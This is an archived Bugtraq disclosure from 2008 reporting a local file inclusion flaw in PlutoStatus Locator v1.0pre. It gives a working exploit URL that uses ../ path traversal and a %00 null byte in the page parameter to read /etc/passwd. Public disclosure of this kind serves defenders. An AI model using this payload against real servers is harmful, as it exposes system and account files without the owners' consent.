PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability

To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability
From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
Date: Thu, 14 Feb 2008 21:01:38 +0100
Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=/gJo2hsbsS7Tn+q7SuNoKhsRDJtHqjdJ5DqGY8xDmvQ=; b=pCD5LqBbypbI0vmhY0bAgmFx4glk7ZNHHKTwroAALocxUJwtgC/MHf2KK3eRef0kqkVCLiGGlzUzz0E1nLDQJCHQgW+YD2/CoKA1hST+S6sq/S5YA8B6a7wKmLCsSb/ETdO2FnfqNYROMAk+CaeLFuHxR3FhgAGTZBlvnfzJv5c=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=pJU1YvskNBdLEZ1eNxFm1V1mUEjuwsDgQbcwVebQabcU+BHHA3ebFk2d1CjdeWUgGa3VNSdP2IA1Vvqpge5CDxGpd5a2Rg8DShOaidMzGKiTgnfbBFUqMeAfEvBjbsASmGrIftjNHrQ3NyxCf6xQARNMZlrO3FxQuPGbe17ADj0=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

PlutoStatus Locator v1.0pre (alpha) local file inclusion vulnerability

download   http://sourceforge.net/projects/plutostatus/

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploit
http://localhost/locator/index.php?page=../../../../../../../../../../etc/passwd%00

Prev by Date: DOINGSOFT-2008-02-11 - IPDiva VPN SSL Brute force attack
Next by Date: Re: UniversalFtp Server 1.0.44 Multiple Remote Denial of service
Previous by thread: DOINGSOFT-2008-02-11 - IPDiva VPN SSL Brute force attack
Next by thread: Re: UniversalFtp Server 1.0.44 Multiple Remote Denial of service
Index(es):
- Date
- Thread